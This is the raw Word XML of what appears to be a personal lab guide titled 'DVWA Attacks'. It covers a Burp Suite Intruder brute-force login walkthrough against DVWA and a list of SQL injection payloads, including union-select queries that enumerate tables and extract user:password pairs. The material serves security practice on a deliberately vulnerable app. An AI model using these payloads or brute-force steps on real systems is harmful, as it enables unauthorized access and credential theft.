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D82" w14:textId="05290D76" w:rsidR="00592281" w:rsidRPr="00142D37" w:rsidRDefault="00592281" w:rsidP="00592281">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto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DVWA___</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>Attacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00142D37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71138015" w14:textId="77777777" w:rsidR="00592281" w:rsidRPr="00B80178" w:rsidRDefault="00592281" w:rsidP="00592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B80178">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute force attack </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14258936" w14:textId="77777777" w:rsidR="00592281" w:rsidRPr="00142D37" w:rsidRDefault="00592281" w:rsidP="0059228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42D37">
        <w:t xml:space="preserve">Open your burp suite and go to proxy and turn </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00142D37">
        <w:t>On</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00142D37">
        <w:t xml:space="preserve"> intercept </w:t>
      </w:r>
      <w:r>
        <w:t>and set proxy on browsers with 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0D9F86" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="00592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in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> security’s change impossible option into low and submit</w:t>
      </w:r>
      <w:r w:rsidRPr="00142D37">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="367BF4C6" wp14:editId="4C6A250C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43600" cy="35814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DDFC0" w14:textId="77777777" w:rsidR="00592281" w:rsidRPr="00B80178" w:rsidRDefault="00592281" w:rsidP="00592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8017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F1C2463" wp14:editId="15ACBA71">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3938270</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5935980" cy="2325370"/>
            <wp:effectExtent l="0" t="0" r="762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 /enter wrong username &amp; password which we can see in intercept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516D9D32" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="00592281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14:paraId="753455D6" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="00592281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14:paraId="73CDE84D" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="00592281">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>right click and send request to intruder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D55D207" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="00592281">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004677D9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1E7937AD" wp14:editId="2B59AB49">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>379549</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3853180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53" cy="385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go with positions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20671A5B" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="00592281">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E6AD74C" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="00592281">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>select cluster bomb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D247F7" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="00592281">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C145D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0CD548" wp14:editId="495EE2C1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>3608070</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>315595</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2339340" cy="2301240"/>
            <wp:effectExtent l="0" t="0" r="3810" b="381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45D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="582DD769" wp14:editId="71ADB40E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>167640</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>247015</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3413760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55" y="21379"/>
                <wp:lineTo x="21455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$add username &amp; password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451FA1E7" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="00592281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14:paraId="6992E638" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="00592281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14:paraId="4396E13D" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="00592281">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E4BB469" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="00592281">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0079151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FE15FEB" wp14:editId="74298453">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>367030</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3817620" cy="2763520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go with payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0954CC0E" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="00592281">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1524F980" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="00592281">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0079151C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="77C648B4" wp14:editId="0CE0189B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>852055</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>425565</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5280660" cy="4017645"/>
            <wp:effectExtent l="0" t="0" r="0" b="190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create two files username.txt &amp; password.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="0079151C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>put valid username and password in a list on word list file (name.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468450C2" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="00592281">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D1AF13A" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="00592281">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0079151C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C1CA57D" wp14:editId="42056235">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>322291</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3220720"/>
            <wp:effectExtent l="0" t="0" r="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55" cy="322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Go to grep extract and follow the steps to get source code </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA5143C" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="00592281">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0023228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3957520" wp14:editId="77BB3FB6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3727450</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="4134485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start </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>attack  and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it will give us correct user name and password by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>brut</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> force attack </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71063DA7" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="00592281">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17781340" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="00592281">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="001B0FAE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5882951" wp14:editId="33A60089">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3282950</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="1226820"/>
            <wp:effectExtent l="0" t="0" r="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18DF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="026F6822" wp14:editId="06FA8419">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>116</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3100705"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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74128" w14:textId="77777777" w:rsidR="00592281" w:rsidRPr="00B41472" w:rsidRDefault="00592281" w:rsidP="00592281"/>
    <w:p w14:paraId="03DBA39B" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="00592281">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1364"/>
        </w:tabs>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C201F64" w14:textId="77777777" w:rsidR="00592281" w:rsidRPr="004A059C" w:rsidRDefault="00592281" w:rsidP="0059228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56"/>
          <w:szCs w:val="56"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A059C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SQL injection - type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17610E01" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="0059228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t>phpmyadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in kali </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01630B91" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="00592281">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>testing vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBF6CED" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="0059228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‘ =</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC2A33A" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="0059228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.1’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFCD94A" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="0059228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.a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3528B10B" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="0059228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-a’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751CBF92" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="0059228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a’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEE364D" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="0059228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“&gt;Test12345&lt;’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA62853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order by {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>random_value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>} — - or 1’ group by 1,2,3,4,5,6,7,8,9,10— -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3465D7D6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union select 1,2— - or 1’ union select “a”, “b”— - // - - -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421604DC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1’ union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1,@</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>@version— -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C536C6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version ()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D33560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1’ union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1,@</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>@version— -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B38FD8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1' union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>1,concat</w:t>
      </w:r>
      <w:proofErr w:type="gram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table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">) from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>=database()-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA247DA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1' union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1,group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">_concat(table_name,0x3a,column_name,0x3c6723e)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=database()-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AB761A" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="0059228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password: of user:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDE7952" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="0059228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1' union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1,group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_concat(user,0x3a,password,0x3c62723e) from user-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE10944" w14:textId="77777777" w:rsidR="00592281" w:rsidRDefault="00592281" w:rsidP="00592281">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="5DC8BF38">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="262D64AD" w14:textId="77777777" w:rsidR="00592281" w:rsidRPr="00B41472" w:rsidRDefault="00592281" w:rsidP="00592281">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1364"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BBA7784" w14:textId="77777777" w:rsidR="003364F1" w:rsidRDefault="003364F1"/>
    <w:sectPr w:rsidR="0033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73C8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0270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E463B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A742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C1689"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="542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216FC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CB6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C5B5B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F7EA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94A55"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E1562C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E82CDA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A15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81"/>
    <w:rsid w:val="003364F1"/>
    <w:rsid w:val="0059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7B74"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{98B44E7F-EBB0-4EE1-8D7D-8436FC32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81"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="005922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228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22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92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Dagaura</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Amar Dagaura</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-15T11:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-15T11:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>